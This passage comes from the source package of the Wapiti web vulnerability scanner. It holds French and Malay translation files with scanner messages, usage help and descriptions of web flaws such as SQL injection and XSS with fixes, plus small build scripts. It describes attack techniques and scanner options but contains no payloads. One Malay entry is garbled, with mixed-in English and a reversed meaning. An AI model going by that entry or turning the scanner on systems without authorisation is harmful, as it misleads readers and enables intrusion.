"sous la racine web et reconfigurer l'éditeur qu'il utilise pour désactiver "
"les sauvegardes automatiques."

msgid "Blind SQL Injection description"
msgstr ""
"Tout comme les failles d'injection SQL classiques, les injections SQL en aveugle "
"permettent à un attaquant d'altérer les requêtes normalement exécutées sur la "
"base de données. Ce type de vulnérabilité est plus difficile à détecter en raison "
"de l'absence de messages d'erreur renvoyés par l'application web."

msgid "Blind SQL Injection solution"
msgstr ""
"Pour se protéger des injections SQL, les données fournies par les "
"utilisateurs ne doivent pas être utilisées telles-quelles dans les requêtes "
"SQL mais doivent faire l'objet de vérifications (filtres, échappements) "
"approfondies."

msgid "Commands execution description"
msgstr ""
"Ce type d'attaque consiste à faire exécuter des commandes sur le serveur. "
"L'attaquant tente d'injecter les commandes dans les paramêtres de requêtes "
"qui lui sont accessibles."

msgid "Commands execution solution"
msgstr "Ce type de vulnérabilité résulte souvent d'un manque de vérifications "
"sur les données soumises par le visiteur. Pour les opérations sur les accès fichiers "
"il est préférable d'utiliser des appels systèmes spécialisés au lieu de tenter "
"de faire exécuter des commandes shell."

msgid "CRLF description"
msgstr ""
"Le terme CRLF fait référence à Carriage Return (ASCII 13, \\r) Line Feed "
"(ASCII 10, \\n). Dans le protocole HTTP, ces deux caractères à la suite "
"permettent entre autres de passer à la ligne d'entête suivante."
""
"Un script qui insère directement dans ses entêtes des données fournies par "
"l'utilisateur peut alors se voir injecter des lignes d'entêtes qui seront "
"interprétées par le navigateur de la victime."

msgid "CRLF solution"
msgstr ""
"Vérifiez que les couples nom / valeur retournés dans les entêtes HTTP ne "
"contiennent pas la suite de caractères CRLF."

msgid "Cross Site Scripting description"
msgstr ""
"Le Cross-site scripting (XSS) est une catégorie de vulnérabilités web qui "
"permet d'exécuter du code dans le navigateur des visiteurs du site. Leur "
"exploitation peut par exemple permettre le détournement d'une session qui a "
"été ouverte sur un site par un utilisateur valide."

msgid "Cross Site Scripting solution"
msgstr ""
"Afin de se protéger des attaques XSS, il faut s'assurer que les données "
"retournées dans une page ne contiennent pas certains caractères interprétés "
"par le navigateur."
""
"Certains caractères considérés dangereux peuvent "
"être remplacés par leur code d'entité HTML."

msgid "File Handling description"
msgstr ""
"Ces techniques permet à l'attaquant d'accèder à des fichiers auxquels il "
"n'est pas sensé accèder car en dehors de la racine du serveur web. En "
"utilisant certaines séquences comme '../', il peut remonter dans "
"l'arborescence pour ainsi lister des répertoires ou obtenir le contenu de "
"fichiers."

msgid "File Handling solution"
msgstr ""
"Ne laissez pas aux utilisateurs la possibilité de choisir une ou plusieurs "
"parties du nom d'un fichier ou d'un répertoire. Générez vous même des noms "
"aléatoire en cas de création ou utilisez des correspondances en cas de "
"templates (un ID numérique correspondant à une chaine de caractères. "
"Utilisez des jails chroot et des restrictions d'accès pour limiter le "
"nombre de fichiers accessibles par le serveur."

msgid "Htaccess bypass description"
msgstr ""
"Les fichiers htaccess permettent de restreindre l'accès a des fichiers ou "
"répertoires en fonction d'identifiants ou méthode HTTP utilisés. Si la "
"configuration a été mal faite il peut être possible de contourner la "
"restriction."

msgid "Htaccess bypass solution"
msgstr ""
"La configuration du htaccess doit être minutieusement vérifiée pour ne pas "
"laisser une porte d'entrée à un éventuel attaquant."

msgid "Internal server error description"
msgstr ""
"Erreur interne au serveur. Le serveur a fait face à une situation inattendue "
"qui l'a empêché de traiter convenablement la requête. Cela peut être le signe de "
"la présence d'une vulnérabilité."

msgid "Internal server error solution"
msgstr "Les logs de votre serveur HTTP ou de l'application web concernée devraient "
"vous renseigner sur la nature exacte du problème."

msgid "Potentially dangerous file description"
msgstr ""
"Certains scripts sont connus pour être potentiellement vulnérables et "
"dangereux. Des listes de tels fichiers existent et sont fréquemment "
"utilisées par des attaquants pour scanner des sites Internet à la recherche "
"de ces vulnérabilitées."

msgid "Potentially dangerous file solution"
msgstr ""
"L'administrateur devrait vérifier régulièrement si des mises à jour sont "
"disponibles pour les scripts et logiciels utilisés sur le serveur. Il est "
"aussi conseillé de se tenir informé sur les nouvelles vulnérabilités "
"trouvées en s'abonnant à des listes de sécurité ou en suivant des flux RSS "
"spécialisés."

msgid "Resource consumption description"
msgstr "Il a fallu un temps anormallement long au serveur pour traiter la reqêquete. "
"Un attaquant pourrait exploiter ce type de faiblesse pour surcharger le serveur."

msgid "Resource consumption solution"
msgstr "Le script en cause utilise probablement certaines ressources système "
"(CPU, mémoire, accès disque etc) de façon inneficace. Son améliorations devrait "
"être étudiée."

msgid "SQL Injection description"
msgstr ""
"Les failles d'injection SQL permettent à un attaquant de modifier les requêtes qui sont "
"normalement exécutées sur le système de base de données. Un attaquant peut alors parvenir "
"à extraire où à modifier des informations en base. Cela peut aussi potentiellement permettre "
"à l'attaquant d'augmenter ses privilèges sur le système."

msgid "SQL Injection solution"
msgstr ""
"Pour se protéger des injections SQL, les données fournies par les "
"utilisateurs ne doivent pas être utilisées telles-quelles dans les requêtes "
"SQL mais doivent faire l'objet de vérifications (filtres, échappements) "
"approfondies."

wapiti-2.3.0+dfsg/wapitiCore/language_sources/generateSources.sh

xgettext --copyright-holder="2009-2013 Nicolas SURRIBAS" --package-name="Wapiti" --package-version="SVN" --from-code=UTF-8 -L Python --no-wrap -d wapiti -o de.po -f file_list.txt -j
xgettext --copyright-holder="2009-2013 Nicolas SURRIBAS" --package-name="Wapiti" --package-version="SVN" --from-code=UTF-8 -L Python --no-wrap -d wapiti -o en.po -f file_list.txt -j
xgettext --copyright-holder="2009-2013 Nicolas SURRIBAS" --package-name="Wapiti" --package-version="SVN" --from-code=UTF-8 -L Python --no-wrap -d wapiti -o es.po -f file_list.txt -j
xgettext --copyright-holder="2009-2013 Nicolas SURRIBAS" --package-name="Wapiti" --package-version="SVN" --from-code=UTF-8 -L Python --no-wrap -d wapiti -o fr.po -f file_list.txt -j
xgettext --copyright-holder="2009-2013 Nicolas SURRIBAS" --package-name="Wapiti" --package-version="SVN" --from-code=UTF-8 -L Python --no-wrap -d wapiti -o ms.po -f file_list.txt -j

wapiti-2.3.0+dfsg/wapitiCore/language_sources/generateTranslations.sh

rm ../config/language/de/LC_MESSAGES/wapiti.mo 2> /dev/null
rm ../config/language/fr/LC_MESSAGES/wapiti.mo 2> /dev/null
rm ../config/language/en/LC_MESSAGES/wapiti.mo 2> /dev/null
rm ../config/language/es/LC_MESSAGES/wapiti.mo 2> /dev/null
rm ../config/language/ms/LC_MESSAGES/wapiti.mo 2> /dev/null
msgfmt de.po -o ../config/language/de/LC_MESSAGES/wapiti.mo
msgfmt fr.po -o ../config/language/fr/LC_MESSAGES/wapiti.mo
msgfmt en.po -o ../config/language/en/LC_MESSAGES/wapiti.mo
msgfmt es.po -o ../config/language/es/LC_MESSAGES/wapiti.mo
msgfmt ms.po -o ../config/language/ms/LC_MESSAGES/wapiti.mo

wapiti-2.3.0+dfsg/wapitiCore/language_sources/ms.po

# Copyright (C) YEAR 2009-2013 Nicolas SURRIBAS
# This file is distributed under the same license as the Wapiti package.
#
#, fuzzy
msgid ""
msgstr ""
"Project-Id-Version: Wapiti SVN\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2013-08-25 17:33+0200\n"
"PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\n"
"Last-Translator: FULL NAME \n"
"Language-Team: LANGUAGE \n"
"Language: \n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"

#: ../vulnerability.py:23
msgid " Evil url: {0}"
msgstr " Pautan berbahaya: {0}"

#: ../vulnerability.py:24
msgid "{0} in {1} via injection in the parameter {2}"
msgstr "{0} in {1} melalui suntikan pada parameter {2}"

#: ../vulnerability.py:25
msgid " coming from {0}"
msgstr " melalui {0}"

#: ../vulnerability.py:26
msgid "{0} in {1} via injection in the query string"
msgstr "{0} in {1} melalui suntikan pada rentetan perintah(query string) "

#: ../vulnerability.py:27
msgid "{0} in {1} via injection in the resource path"
msgstr "{0} in {1} melalui suntikan pada sumber laluan"

#: ../vulnerability.py:28
msgid "Involved parameter: {0}"
msgstr "Parameter terlibat: {0}"

#: ../vulnerability.py:29
msgid "Evil request:"
msgstr "Permintaan berbahaya:"

#: ../vulnerability.py:67
msgid "SQL Injection"
msgstr "Suntikan SQL"

#: ../vulnerability.py:68
msgid "Blind SQL Injection"
msgstr "Suntikan buta SQL "

#: ../vulnerability.py:69
msgid "File Handling"
msgstr "Pengendalian Fail"

#: ../vulnerability.py:70
msgid "Cross Site Scripting"
msgstr "Penyuntikan Skrip Ke Laman Web(Cross Site Scripting)"

#: ../vulnerability.py:72
msgid "Commands execution"
msgstr "Perintah arahan"

#: ../vulnerability.py:73
msgid "Htaccess Bypass"
msgstr "Pemintasan Htaccess"

#: ../vulnerability.py:74
msgid "Backup file"
msgstr "Fail Sadaran"

#: ../vulnerability.py:75
msgid "Potentially dangerous file"
msgstr "Fail berpontensi bahaya"

#: ../vulnerability.py:80
msgid "Internal Server Error"
msgstr "Ralat Pelayan Dalaman"

#: ../vulnerability.py:81
msgid "Resource consumption"
msgstr "Penggunaan sumber"

#: ../vulnerability.py:83
msgid "Received a HTTP 500 error in {0}"
msgstr "Terima ralat HTTP 500 dalam {0}"

#: ../vulnerability.py:84
msgid "Timeout occured in {0}"
msgstr "Tamat masa dalam {0}"

#: ../vulnerability.py:86
msgid "The request timed out while attempting to inject a payload in the query string"
msgstr "Permintaan tamat masa sementara mencuba untuk menyuntik muatan (payload) pada rentetan perintah (query string)"

#: ../vulnerability.py:87
msgid "The request timed out while attempting to inject a payload in the resource path"
msgstr "Permintaan tamat masa sementara mencuba untuk menyuntik muatan (payload) pada sumber laluan(resource path)"

#: ../vulnerability.py:88
msgid "The request timed out while attempting to inject a payload in the parameter {0}"
msgstr "Permintaan tamat masa ketika mencuba untuk menyuntik muatan (payload) pada parameter {0}"

#: ../vulnerability.py:90
msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the query string"
msgstr "Pelayan membalas kod ralat HTTP 500 ketika mencuba menyuntik muatan (payload) pada rentetan perintah (query string)"

#: ../vulnerability.py:92
msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the resource path"
msgstr "Pelayan membalas kod ralat HTTP 500 ketika mencuba untuk menyuntik muatan (payload) pada laluan sumber(resource path)"

#: ../vulnerability.py:94
msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter {0}"
msgstr "Pelayan membalas kod ralat HTTP 500 ketika mencuba untuk menyuntik muatan (payload) pada parameter {0}"

#: ../wapiti.py:69
msgid "Invalid argument for option {0} : {1}"
msgstr "Argumen tidah sah untuk pilihan {0} : {1}"

#: ../wapiti.py:226
msgid "[*] Loading modules:"
msgstr "[*] Memuatkan modul:"

#: ../wapiti.py:297
msgid "No links or forms found in this page !"
msgstr "Tiada pautan atau borang ditemui dalam muka laman ini !"

#: ../wapiti.py:298
msgid "Make sure the url is correct."
msgstr "Pastikan url adalah betul."

#: ../wapiti.py:310
msgid "[!] Missing dependecies for module {0}:"
msgstr "[!] Hilang kebergantungan untuk modul {0}:"

#: ../wapiti.py:316
msgid "[+] Launching module {0}"
msgstr "[+] Pelancaran modul {0}"

#: ../wapiti.py:321
msgid "Upload scripts found:"
msgstr "Memuat naik skrip (Upload scripts) ditemui:"

#: ../wapiti.py:335
msgid "Report"
msgstr "Laporan"

#: ../wapiti.py:337
msgid "A report has been generated in the file {0}"
msgstr "Laporan telah dijana dalam fail {0}"

#: ../wapiti.py:339
msgid "Open {0}/index.html with a browser to see this report."
msgstr "Buka {0}/index.html dengan pelayar web untuk melihat laporan ini."

#: ../wapiti.py:410
msgid "wapitiDoc"
msgstr ""
"Wapiti-2.3.0 - Pengimbas kerentanan aplikasi web dan sekuriti auditor \n"
" \n"
" Usage: python wapiti.py http://server.com/base/url/ [options] \n"
" \n"
" Pilihan arahan yang disokong oleh aplikasi: \n"
" -s \n"
" --start \n"
" \tUntuk menentukan url bermula dengan. Pilihan ini boleh diguna pakai beberapa kali.\n"
" \tWapiti akan lihat pautan ini untuk mencari lebih banyak URL walaupun pautan tertentu tidak berada di dalam skop.\n"
" \n"
" -x \n"
" --exclude \n"
" \tUntuk mengecualikan URL dari imbasan (contoh: URL log keluar). Pilihan ini boleh diguna pakai beberapa kali untuk menentukan beberapa URL.\n"
" \tKad liar (*) boleh digunakan di URL untuk regex asas.\n"
" \tContoh : -x http://server/base/?page=*&module=test\n"
" \tatau -x http://server/base/admin/* untuk mengecualikan satu direktori.\n"
" \n"
" -p \n"
" --proxyi \n"
" \tUntuk menentukan proksi. Proksi-proksi yang disokong pada masa ini adalah HTTP dan HTTPS.\n"
" \tPilihan ini boleh digunakan dua kali untuk tentukan proksi HTTP dan HTTPS.\n"
" \tContoh: -p http://proksi:port/\n"
" \n"
" -c \n"
" --cookie \n"
" \tUntuk mengimport cookie menggunakan imbasan. Fail cookie tersebut mesti dalam format JSON.\n"
" \tCookies boleh diperolehi menggunakan utiliti cookie.py dan getcookie.py (direktori net).\n"
" \n"
" -t \n"
" --timeout \n"
" \tUntuk menetapkan had tamat masa(maksimum masa dalam saat menunggu pelayan untuk menghantar maklum balas).\n"
" \n"
" -a \n"
" --auth \n"
" \tKelayakan yang ditetapkan bagi pengesahan HTTP.\n"
" \n"
" --auth-method \n"
" \tJika pelayan memerlukan pengesahan, tetapkan kaedah pengesahan untuk digunakan.\n"
" \tKaedah yang disokong pada masa ini (sesetengah memerlukan modul tambahan untuk dimuat turun) adalah:\n"
" \t\t+ basic\n"
" \t\t+ digest\n"
" \t\t+ kerberos\n"
" \t\t+ ntlm\n"
" \n"
" -r \n"
" --remove \n"
" \tMengeluarkan satu parameter (nama dan nilai) dari URL.\n"
" \n"
" -n \n"
" --nice \n"
" \tMenentukan had URL untuk mencari dengan pola yang sama (iaitu, bilangan maksimum nilai-nilai yang unik bagi parameter yang sama).\n"
" \tGunakan pilihan ini untuk menghalang 'loop' berterusan semasa imbasan. Had mesti lebih daripada 0.\n"
" \n"
" -m \n"
" --module \n"
" \tMenyediakan modul (dan kaedah HTTP untuk setiap modul) untuk diguna ketika serangan.\n"
" \tGuna prefiks nama modul dengan 'dash' untuk menyahaktifkan modul yang berkaitan.\n"
" \tUntuk hanya mencari sasaran (tanpa menghantar sebarang muatan), menyahaktifkan setiap modul dengan -m \"-all\".\n"
" \tJika anda tidak menentukan kaedah HTTP, GET dan POST akan digunakan.\n"
" \tContoh: -m \"-all,xss:get,exec:post\"\n"
" \n"
" -u \n"
" --color \n"
" \tMenggunakan warna untuk menyerlahkan kelemahan dan keganjilan (anomalies) dalam output. \n"
" \n"
" -v \n"
" --verbose \n"
" \tTetapkan tahap verbositi. \n"
" \t0:tenang (default), 1: cetak setiap URL, 2: cetak setiap serangan. \n"
" \n"
" -b \n"
" --scope \n"
" \tSet skop imbasan:\n"
" \t\t+ page: untuk menganalisis hanya muka laman yang diberikan sebagai URL asas.\n"
" \t\t+ folder: untuk menganalisis semua URL di bawah URL asas dihantar ke Wapiti (default).\n"
" \t\t+ domain: untuk menganalisis semua pautan pada muka laman yang mengandungi domain URL sama yang dihantar ke Wapiti.\n"
" \n"
" -f \n"
" --format \n"
" \tSet jenis format untuk laporan. \n"
" \tjson: Laporan dalam format JSON \n"
" \thtml: Laporan dalam format HTML (default)\n"
" \topenvas: Laporan dalam format OpenVAS XML \n"
" \ttxt: Laporran dalam teks biasa (UTF-8) \n"
" \tvulneranet: Laporan dalam format VulneraNET (berasaskan XML) \n"
" \txml: Laporan dalam format XML \n"
" \n"
" -o \n"
" --output \n"
" \tTetapkan nama fail laporan. \n"
" \tJika format laporan yang dipilih adalah 'html', parameter ini akan digunakan sebagai nama direktori.\n"
" \n"
" -i \n"
" --continue \n"
" \tParameter ini menyatakan kepada Wapiti untuk menyambung imbasan sebelumnya yang disimpan di dalam\n"
"fail status XML yang ditentukan sebelum ini.\n"
" \tNama fail adalah pilihan, jika tidak dinyatakan, Wapiti mengambil fail "
"default daripada direktori \"scans\".\n"
" \n"
" -k \n"
" --attack \n"
" \tParameter ini menyatakan kepada Wapiti untuk meneruskan serangan tanpa mengimbas "
"laman web sekali lagi, memuatkan status imbasan daripada fail yang ditentukan.\n"
" \tNama fail adalah pilihan, jika ia tidak dinyatakan, Wapiti mengambil default"
"fail daripada direktori \"scans\".\n"
" \n"
" --verify-ssl <0|1>\n"
" \tParameter ini menyatakan sama ada Wapiti perlu menyemak Sijil SSL.\n"
" \tDefault adalah untuk mengesahkan sijil-sijil\n"
" \n"
" -h \n"
" --help \n"
" \tUntuk mencetak mesej penggunaan ini\n"
" "

#: ../wapiti.py:418
msgid "Wapiti-2.3.0 (wapiti.sourceforge.net)"
msgstr "Wapiti-2.3.0 (wapiti.sourceforge.net)"

#: ../wapiti.py:549
msgid "File {0} loaded. Wapiti will use it to perform the attack"
msgstr "Fail {0} dimuatkan. Wapiti akan menggunakannya untuk melakukan serangan"

#: ../attack/attack.py:166
msgid "+ attackGET {0}"
msgstr "+ attackGET {0}"

#: ../attack/attack.py:171 ../attack/attack.py:185
#: ../attack/mod_permanentxss.py:87 ../attack/mod_permanentxss.py:89
#: ../attack/mod_permanentxss.py:147 ../attack/mod_permanentxss.py:272
msgid "error: {0} while attacking {1}"
msgstr "ralat: {0} ketika serangan {1}"

#: ../attack/attack.py:173 ../attack/attack.py:187
msgid "error: timeout while attacking {0}"
msgstr "ralat: tamat masa ketika serangan {0}"

#: ../attack/attack.py:180
msgid "+ attackPOST {0} from {1}"
msgstr "+ attackPOST {0} dari {1}"

#: ../attack/mod_backup.py:89
msgid "Found backup file !"
msgstr "Temui fail sandaran !"

#: ../attack/mod_backup.py:94
msgid "Backup file {0} found for {1}"
msgstr "Fail sandaran {0} ditemui untuk {1}"

#: ../attack/mod_blindsql.py:40
msgid "Blind SQL vulnerability"
msgstr "Kelemahan SQL buta "

#: ../attack/mod_blindsql.py:93 ../attack/mod_file.py:146
#: ../attack/mod_sql.py:131
msgid "{0} via injection in the query string"
msgstr "{0} melalui suntikan pada rentetan perintah (query string)"

#: ../attack/mod_blindsql.py:141 ../attack/mod_blindsql.py:222
#: ../attack/mod_exec.py:195 ../attack/mod_exec.py:292
#: ../attack/mod_file.py:211 ../attack/mod_file.py:301
#: ../attack/mod_sql.py:258
msgid "{0} via injection in the parameter {1}"
msgstr "{0} melalui suntikan pada parameter {1}"

#: ../attack/mod_crlf.py:31
msgid "CRLF Injection"
msgstr "Suntikan CRLF"

#: ../attack/mod_crlf.py:70 ../attack/mod_crlf.py:77
msgid "(QUERY_STRING)"
msgstr "(RENTETAN_QUERY)"

#: ../attack/mod_crlf.py:121
msgid "Error: The server did not understand this request"
msgstr "Ralat: Pelayan tidak memahami permintaan tersebut"

#: ../attack/mod_exec.py:45
msgid "Command execution"
msgstr "Perintah arahan"

#: ../attack/mod_exec.py:48
msgid "PHP evaluation"
msgstr "Penilaian PHP"

#: ../attack/mod_exec.py:51 ../attack/mod_exec.py:54
msgid "Warning exec"
msgstr "Amaran exec"

#: ../attack/mod_exec.py:57 ../attack/mod_exec.py:63
msgid "preg_replace injection"
msgstr "Suntikan preg_replace"

#: ../attack/mod_exec.py:60
msgid "Warning usort()"
msgstr "Amaran usort()"

#: ../attack/mod_exec.py:66
msgid "Warning assert"
msgstr "Amaran menegaskan"

#: ../attack/mod_exec.py:69
msgid "Evalutation warning"
msgstr "Amaran penilaian"

#: ../attack/mod_file.py:40
msgid "Remote inclusion vulnerability"
msgstr "Kemasukan kelemahan jauh (remote)"

#: ../attack/mod_file.py:41
msgid "Linux local file disclosure vulnerability"
msgstr "Kelemahan pendedahan fail Linux setempat"

#: ../attack/mod_file.py:42
msgid "BSD local file disclosure vulnerability"
msgstr "Kelemahan pendedahan fail BSD setempat"

#: ../attack/mod_file.py:43
msgid "Windows local file disclosure vulnerability"
msgstr "Kelemahan pendedahan fail Windows setempat"

#: ../attack/mod_file.py:44 ../attack/mod_file.py:45
msgid "File disclosure vulnerability in include_path"
msgstr "Kelemahan pendedahan fail pada include_path"

#: ../attack/mod_file.py:46
msgid "highlight_file() vulnerability in basedir"
msgstr "Kelemahan highlight_file() pada basedir"

#: ../attack/mod_file.py:47
msgid "include() of file in include_path"
msgstr "include() termasuk dalam include_path"

#: ../attack/mod_file.py:84
msgid "Possible {0} vulnerability"
msgstr "Kemungkinan {0} kelemahan"

#: ../attack/mod_htaccess.py:75
msgid "HtAccess protection found: {0}"
msgstr "Perlindungan HtAccess ditemui: {0}"

#: ../attack/mod_htaccess.py:85
msgid "|HTTP Code: {0} : {1}"
msgstr "|HTTP Kod: {0} : {1}"

#: ../attack/mod_htaccess.py:88 ../attack/mod_htaccess.py:102
msgid "Source code:"
msgstr "Kod program:"

#: ../attack/mod_htaccess.py:94
msgid "{0} HtAccess"
msgstr "{0} HtAccess"

#: ../attack/mod_htaccess.py:95
msgid " .htaccess bypass vulnerability: {0}"
msgstr " Kelemahan pemintasan .htaccess : {0}"

#: ../attack/mod_htaccess.py:99
msgid "|HTTP Code: {0}"
msgstr "Kod |HTTP: {0}"

#: ../attack/mod_nikto.py:75
msgid "Problem with local nikto database."
msgstr "Gangguan dengan pangkalan data setempat nikto"

#: ../attack/mod_nikto.py:76
msgid "Downloading from the web..."
msgstr "Memua turun dari web..."

#: ../attack/mod_nikto.py:90
msgid "Error downloading Nikto database"
msgstr "Ralat memuat turun pangkalan data Nikto"

#: ../attack/mod_nikto.py:235 ../attack/mod_nikto.py:237
msgid "References:"
msgstr "Rujukan:"

#: ../attack/mod_permanentxss.py:57
msgid "Stored XSS vulnerability"
msgstr "Kelemahan XSS simpanan (stored)"

#: ../attack/mod_permanentxss.py:115 ../attack/mod_permanentxss.py:161
msgid "Found permanent XSS in {0} with {1}"
msgstr "Menemui XSS tetap pada {0} dengan {1}"

#: ../attack/mod_permanentxss.py:213 ../attack/mod_permanentxss.py:280
msgid "Found permanent XSS attacked by {0} with fields {1}"
msgstr "Menemui serangan XSS tetap oleh{0} dengan medan {1}"

#: ../attack/mod_sql.py:39 ../attack/mod_sql.py:41
msgid "MySQL Injection"
msgstr "Suntikan MySQL"

#: ../attack/mod_sql.py:43
msgid "Access-Based SQL Injection"
msgstr "Akses berasaskan Suntikan SQL"

#: ../attack/mod_sql.py:45 ../attack/mod_sql.py:47 ../attack/mod_sql.py:49
#: ../attack/mod_sql.py:70
msgid "MSSQL-Based Injection"
msgstr "Suntikan berasaskan MSSQL"

#: ../attack/mod_sql.py:52
msgid "Java.SQL Injection"
msgstr "Suntikan Java.SQL"

#: ../attack/mod_sql.py:54
msgid "PostgreSQL Injection"
msgstr "Suntikan PostgreSQL"

#: ../attack/mod_sql.py:56 ../attack/mod_sql.py:58
msgid "XPath Injection"
msgstr "Suntikan XPath"

#: ../attack/mod_sql.py:60
msgid "LDAP Injection"
msgstr "Suntikan LDAP"

#: ../attack/mod_sql.py:62
msgid "DB2 Injection"
msgstr "Suntikan DB2"

#: ../attack/mod_sql.py:64
msgid "Interbase Injection"
msgstr "Suntikan Interbase"

#: ../attack/mod_sql.py:66
msgid "Sybase Injection"
msgstr "Suntikan Sybase"

#: ../attack/mod_sql.py:68
msgid ".NET SQL Injection"
msgstr "Suntikan .NET SQL"

#: ../attack/mod_sql.py:72
msgid "Acess-Based SQL Injection"
msgstr "Suntikan SQL berasaskan Akses"

#: ../attack/mod_sql.py:76
msgid "Oracle Injection"
msgstr "Suntikan Oracle"

#: ../attack/mod_xss.py:59
msgid "XSS vulnerability"
msgstr "Kelemahan XSS"

#: ../attack/mod_xss.py:126 ../attack/mod_xss.py:337
msgid "XSS vulnerability found via injection in the resource path"
msgstr "Kelemahan XSS ditemui melalui suntikan pada sumber laluan (resource path)"

#: ../attack/mod_xss.py:196
msgid "XSS vulnerability found via injection in the query string"
msgstr "Kelemahan XSS ditemui melalui suntikan pada rentetan perintah (query string)"

#: ../attack/mod_xss.py:270 ../attack/mod_xss.py:437
msgid "XSS vulnerability found via injection in the parameter {0}"
msgstr "Kelemahan XSS ditemui melalui suntikan pada parameter {0}"

#: ../net/getcookie.py:97
msgid "No forms found in this page !"
msgstr "Tiada borang ditemui pada muka laman ini !"

#: ../net/getcookie.py:104
msgid "Choose the form you want to use :"
msgstr "Pilih borang yang anda hendak guna:"

#: ../net/getcookie.py:113
msgid "Enter a number : "
msgstr "Masukkan nombor : "

#: ../net/getcookie.py:120
msgid "Please enter values for the following form: "
msgstr "Sila masukkan nilai untuk borang berikut: "

#: ../net/getcookie.py:121
msgid "url = {0}"
msgstr "url = {0}"

#: ../net/cookie.py:75
msgid "Error getting url {0}"
msgstr "Ralat mendapatkan url {0}"

#: ../net/lswww.py:164
msgid "First argument must be the root url !"
msgstr "Argumen pertama mestilah url asas (root url) !"

#: ../net/lswww.py:169
msgid "Invalid protocol: {0}"
msgstr "Protokol tidak sah: {0}"

#: ../net/lswww.py:208
msgid "Invalid link argument: {0}"
msgstr "Pautan argumen tidak sah: {0}"

#: ../net/lswww.py:266
msgid "Connection refused!"
msgstr "Sambungan ditolak!"

#: ../net/lswww.py:270
msgid "Exception in lswww.browse: {0}"
msgstr "Pengecualian pada lswww.browse: {0}"

#: ../net/lswww.py:665
msgid "File {0} loaded, the scan continues:"
msgstr "Fail {0} dimuatkan, imbasan terus:"

#: ../net/lswww.py:667
msgid " * URLs to browse"
msgstr " * URLs untuk dilayar"

#: ../net/lswww.py:670
msgid " * URLs browsed"
msgstr " * URLs dilayari"

#: ../net/lswww.py:674
msgid "File {0} not found, Wapiti will scan again the web site"
msgstr "Fail {0} tidak ditemui, Wapiti akan mengimbas semula laman web"

#: ../net/lswww.py:707 ../net/lswww.py:715
msgid " Notice"
msgstr " Notice"

#: ../net/lswww.py:709
msgid "This scan has been saved in the file {0}/{1}.xml"
msgstr "Imbasan ini telah disimpan dalam fail {0}/{1}.xml"

#: ../net/lswww.py:711
msgid "You can use it to perform attacks without scanning again the web site with the \"-k\" parameter"
msgstr "Anda boleh menggunakannya untuk melakukan serangan tanpa imbasan semula laman web dengan \"-k\" parameter"

#: ../net/lswww.py:717
msgid "Scan stopped, the data has been savedin the file {0}/{1}.xml"
msgstr "Imbasan berhenti, data telah disimpan dalam fail {0} / {1}.xml"

#: ../net/lswww.py:719
msgid "To continue this scan, you should launch Wapiti with the \"-i\" parameter"
msgstr "Untuk meneruskan imbasan ini, anda harus melancarkan Wapiti dengan \"-i\" parameter"

#: ../net/lswww.py:729
msgid "URLs"
msgstr "URLs"

#: ../net/lswww.py:736
msgid "Forms Info"
msgstr "Maklumat Borang"

#: ../net/lswww.py:738
msgid "From: {0}"
msgstr "Dari: {0}"

#: ../net/lswww.py:739
msgid "To: {0}"
msgstr "Ke: {0}"

#: ../net/lswww.py:747
msgid "Upload Scripts"
msgstr "Memuat naik skrip"

#: ../net/lswww.py:1008
msgid "Forms"
msgstr "Borang"

#: ../net/lswww.py:1011
msgid "Form {0}"
msgstr "Borang {0}"

#: ../net/lswww.py:1015
msgid " * Method: {0}"
msgstr " * Kaedah: {0}"

#: ../net/lswww.py:1016
msgid " * Intputs:"
msgstr " * Inputs:"

#: ../net/lswww.py:1021
msgid " * Selects:"
msgstr " * Pilih:"

#: ../net/lswww.py:1026
msgid " * TextAreas:"
msgstr " * Kawasan teks:"

#: ../net/lswww.py:1032
msgid "URLS"
msgstr "URLS"

#: ../report/txtreportgenerator.py:69
msgid "Report for {0}\n"
msgstr "Laporan untuk {0}\n"

#: ../report/txtreportgenerator.py:70
msgid "Date of the scan : {0}\n"
msgstr "Tarikh imbasan : {0}\n"

#: ../report/txtreportgenerator.py:72
msgid "Scope of the scan : {0}\n"
msgstr "Skop imbasan : {0}\n"

#: ../report/txtreportgenerator.py:75
msgid "Summary of vulnerabilities :"
msgstr "Rumusan kelemahan :"

#: ../report/txtreportgenerator.py:78
msgid "{0} : {1:>3}\n"
msgstr "{0} : {1:>3}\n"

#: ../report/txtreportgenerator.py:88 ../report/txtreportgenerator.py:105
msgid "Evil request:\n"
msgstr "Permintaan berbahaya:\n"

#: ../report/txtreportgenerator.py:91
msgid "cURL command PoC : \"{0}\""
msgstr "Perintah cURL PoC : \"{0}\""

#: ../report/txtreportgenerator.py:97
msgid "Anomalies found:"
msgstr "Keganjilan (anomalies) ditemui:"

#: ../wapiti.py:560 ../wapiti.py:559
msgid "Attack process interrupted. To perform again the attack, lauch Wapiti with \"-i\" or \"-k\" parameter."
msgstr "Proses serangan terganggu. Untuk mengulangi serangan, lancarkan Wapiti dengan \"-i\" or \"-k\" parameter."

#: ../wapiti.py:551
msgid "File {0} not found. Wapiti will scan the web site again"
msgstr "Fail {0} tidak ditemui. Wapiti akan imbas semula laman web"

msgid "[!] Unable to find a module named {0}"
msgstr "[!] Tidak dapat menemui modul yang dinama {0}"

msgid "Backup file description"
msgstr ""
"Kemungkinan untuk menemui fail sandaran pada skrip di pelayan web "
"dimana pentadbir web meletakkan disini untuk menyimpan versi sebelum atau fail sandaran yang "
"dijana secara automasi oleh perisian penyuntingan (seperti Emacs). "
"Salinan ini boleh mendedahkan maklumat yang menarik seperti kod program atau "
"kelayakkan"

msgid "Backup file solution"
msgstr ""
"Pentadbir web mesti secara manual menghapuskan fail sandaran atau mengalihnya keluar dari laman web "
"asas (root). Pentadbir web perlu menyusun semula penyunting untuk menyahaktifkan sandaran automatik"

msgid "Blind SQL Injection description"
msgstr ""
"Suntikan SQL buta merupakan teknik yang mengeksploitasi kelemahan yang berlaku "
"in the database of an application. This kind of vulnerability is harder to "
"dalam pangkalan data aplikasi. Kelemahan jenis ini lebih sukar untuk mengesan daripada suntikan SQL asas kerana mesej ralat akan dipaparkan "
"pada laman web."

msgid "Blind SQL Injection solution"
msgstr ""
